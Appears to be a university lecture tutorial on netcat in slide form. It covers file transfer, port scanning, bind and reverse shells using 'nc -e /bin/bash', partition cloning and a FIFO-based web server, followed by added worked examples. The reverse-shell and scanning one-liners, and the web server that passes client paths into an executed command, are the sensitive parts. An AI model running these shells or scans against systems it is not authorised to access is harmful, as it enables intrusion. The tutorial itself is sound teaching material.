In the exercise session of 13/11 we looked at two exam problems. Here you can find the related files:
(use tpp to view them)
--author Giovanni Agosta
--title Netcat Tutorial
--date today

An introduction to Netcat, the TCP/IP Swiss Army Knife

--newpage intro
--heading What is Netcat?

* Basically, Netcat opens a TCP (or UDP) connection to a given address and port
* The connection then functions as a pipe in both directions
  - Anything sent to stdin is copied to the stdout of the other machine
* Thus, it serves a purpose similar to pipes, but allows processes on different machines to be composed
* And now, 9 quick & dirty tricks with Netcat!

--newpage cat
--heading 1 Chat & File Transfer

receiver:
--beginoutput
nc -l -p <#port>
--endoutput
transmitter:
--beginoutput
nc localhost <#port>
nc <#address> <#port>
--endoutput
* Use redirection of stdin/stdout to perform file transfer
* Use -q to force termination after end of input or after a given time
* Communication is bidirectional

--newpage socket
--heading 2 Handling Information Requests

You can make up a simple server to make information available on a given port:
--beginoutput
while true ; do cat /proc/loadavg | nc -l -p <#port> -q 1 > logfile.log ; done
--endoutput
* This script returns the current content of the loadavg file from procfs to any request
* It can be used to implement a quick and dirty version of process B from the exam of March 9, 2006

--newpage filter
--heading 3 Filter Network Traffic

Redirecting a stream on a given port through filters and finally to the actual server, which has been set to listen on a different port.
--beginoutput
mkfifo back
nc -l -p <#expectedport> 0<back | <infilter> | nc localhost <#actualport> | <outfilter> >back
--endoutput
* Use a fifo to handle the backward dataflow
* Use a pair of netcat server and client to redirect traffic
* Use any program or script to filter incoming and outgoing data

--newpage scanning
--heading 4 Port Scanning

Finding open ports and associated servers at a given address
--beginoutput
nc -v -z -w 1 <#address> <#port>-<#port>
--endoutput
* Scans all ports in a range at the given address
* Uses no input or output (-z)
* Drops the connection after 1 second (-w 1)
* Prints out the active ports (using the verbose option)

--newpage telnet
--heading 5 Telnet

On the local machine
--beginoutput
nc <#address> <#port>
--endoutput
On the remote machine
--beginoutput
nc -l <#port> -e /bin/bash
--endoutput
* You obtain a shell on the remote machine

--newpage reverse
--heading 6 Reverse Telnet

On the local machine
--beginoutput
nc -l -vv <#port>
--endoutput
On the remote machine
--beginoutput
nc -vv <#address> <#port> -e /bin/bash
--endoutput
* You obtain a shell on the remote machine
* Use cryptcat (netcat + blowfish) for such uses!
--newpage partition
--heading 7 Partition Cloning over the Network

Copying an entire partition to a different machine:
--beginoutput
dd if=/dev/<#partition> | netcat <#address> <#port>
netcat -l -p <#port> | dd of=/dev/<#partition>
--endoutput
* Uses dd to read and write to/from the partition
* Both partitions should be unmounted

--newpage search
--heading 8 Search Engine Querying

Querying the Google search engine:
--beginoutput
echo -e "GET /search?q=Mystara HTTP/1.1\nUser-agent: Mozilla\n\n" | netcat google.com 80 | sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g' | grep href=\"http | grep -v google | grep -v cache | sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g'
--endoutput
Let's have a look at the individual filters

--newpage search2
--heading Search Engine Querying

--beginoutput
echo -e "GET /search?q=Mystara HTTP/1.1\nUser-agent: Mozilla\n\n"
--endoutput
* Build the query string as an HTTP GET, specifying a valid (although ultimately fake) agent to avoid error messages such as "frames not supported"
* Output the query to stdout
--beginoutput
netcat google.com 80
--endoutput
* Redirect stdin to google.com at port 80
* At the same time, redirect the response from google.com to stdout

--newpage search3
--heading Search Engine Querying

--beginoutput
sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g'
sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g'
--endoutput
* sed is a stream editor; it runs as a filter
* -e executes the following string as a sed script
* s/<pattern>/<replacement>/g replaces every instance of the pattern within the input stream with the replacement string
* \1 is a positional reference to the part of the pattern within \( \)

--newpage search4
--heading Search Engine Querying

* Google's html comes without line breaks
* The first sed filter puts each hyperlink on its own line
* Now we can grep for lines that contain a hyperlink
--beginoutput
grep href=\"http | grep -v google | grep -v cache
--endoutput
* But not an internal hyperlink (either cache or links to other Google services)
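The four filter stages of trick 8 can be tried without netcat by feeding them a page built inline. The script below is an added example, not part of the original slides: the sample HTML, the function names `extract_links`, `count_links` and `first_link` are constructed here; the sed and grep stages are the ones from the slides (GNU sed is assumed for `\n` in the replacement). The sample keeps all anchors on one line, as the slides describe Google's output, so it exercises the line-splitting step.

```shell
#!/bin/sh
# Added example: the link-extraction filters of trick 8 applied to a
# constructed page, so the pipeline can be run and checked offline.

# Constructed sample page: every anchor sits on a single line, like the
# line-break-free HTML described in the slides.
SAMPLE_HTML='<html><body><a href="http://www.google.com/intl/en/about.html">About</a><a href="http://example.org/mystara">Mystara wiki</a><a href="/search?q=Mystara&start=10">Next</a><a href="http://webcache.googleusercontent.com/cache?q=x">Cached</a><a href="https://example.net/page" class="l">Another</a></body></html>'

# extract_links: reads HTML on stdin, writes one external URL per line.
# Stage 1: put each <a href ...> tag on its own line (GNU sed: \n is a newline)
# Stage 2: keep only lines with an absolute http(s) link
# Stage 3: drop links to Google's own services and cached copies
# Stage 4: strip the anchor markup, leaving the URL captured by \( \)
extract_links() {
  sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g' \
  | grep 'href="http' \
  | grep -v google \
  | grep -v cache \
  | sed -e 's/<a href="\([^"]*\)"[^>]*>/\1/g'
}

# count_links: how many external URLs the sample yields
count_links() {
  printf '%s\n' "$SAMPLE_HTML" | extract_links | wc -l | tr -d ' '
}

# first_link: the first external URL in document order
first_link() {
  printf '%s\n' "$SAMPLE_HTML" | extract_links | head -n 1
}

# Run the pipeline on the sample: the google.com and webcache anchors are
# filtered out, the relative /search link never matches href="http, and the
# two example.* links remain.
printf '%s\n' "$SAMPLE_HTML" | extract_links
```

Of the five anchors in the sample only the two external ones survive, which is exactly the behaviour the slides describe; note that stage 3 relies on the hostname containing the substring "google" or "cache", so it is a heuristic rather than a parser.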
--newpage webserver
--heading 9 A Web Server

--beginoutput
mkfifo p ; mkfifo f ; cat f > p &
while true ; do nc -v -q 2 -l -p 8080 0<p | \
  grep -m1 GET | \
  sed -e 's/GET \/\([^ ]*\) HTTP[/0-9.]*/cat \/var\/www\/html\/\1 >f /ep ; q' \
  2>webserver.log ; done
--endoutput

--newpage conclusion
--heading Conclusion

--boldon
--center Like its namesake, netcat has (at least) 9 lives ;)
--boldoff

   /\_/\          Examples from:
  / 0 0 \         Few Useful Netcat Tricks (1-7)
  ====v====       the OpenBSD netcat documentation (8)
   \  W  /        and yours truly (9)
   |     |     _
   / ___ \    /
  / /   \ \  |
 (((-----)))-'
  /
 (   ___
  \__.=|___E      (ascii art from http://nc.sourceforge.net)
 /
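In the trick 9 web server above, the path captured from the request line (`\1`) is spliced straight into the `cat /var/www/html/\1` command that sed executes through its `e` flag, with no check on what the client sent. The function below is an added example, not part of the original slides: it shows a validating step that could be run on the request line before any command is built from it. The function name `request_path`, the `index.html` default and the constructed request lines are assumptions of this example; the document root is the one used on the slide.

```shell
#!/bin/sh
# Added example: validate the request line of the trick 9 web server before
# a file path is built from it. Not part of the original slides.
DOCROOT=/var/www/html    # the root used by the slide's cat command

# request_path: given one HTTP request line, print the file to serve, or
# print nothing and return 1 when the request must be refused.
request_path() {
  line=$1
  # accept only "GET /<path> HTTP/<digit>.<digit>", nothing else
  case $line in
    "GET /"*" HTTP/"[0-9].[0-9]*) ;;
    *) return 1 ;;
  esac
  # take what lies between "GET /" and " HTTP/"
  path=${line#GET /}
  path=${path%% HTTP/*}
  # an empty path means the site root (index.html is an assumed default)
  if [ -z "$path" ]; then
    path=index.html
  fi
  # refuse any ".." component, so the path cannot climb out of DOCROOT
  case "/$path/" in
    */../*) return 1 ;;
  esac
  # refuse any character outside a small allow-list: the slide's server
  # executes the path inside a shell command, so shell syntax must not pass
  case $path in
    *[!A-Za-z0-9._/-]*) return 1 ;;
  esac
  printf '%s/%s\n' "$DOCROOT" "$path"
}

# Constructed request lines, as the server would read them with grep -m1 GET
request_path 'GET /docs/page.html HTTP/1.1'
request_path 'GET / HTTP/1.0'
request_path 'GET /../secret HTTP/1.1' || echo 'refused: parent directory reference'
request_path 'GET /a;b HTTP/1.1'       || echo 'refused: character outside allow-list'
request_path 'POST /a HTTP/1.1'        || echo 'refused: not a GET request'
```

The allow-list is deliberately strict (letters, digits, dot, underscore, slash and dash); anything the slide's document tree needs beyond that can be added to the bracket expression, while the `..` check should stay regardless of how the list grows.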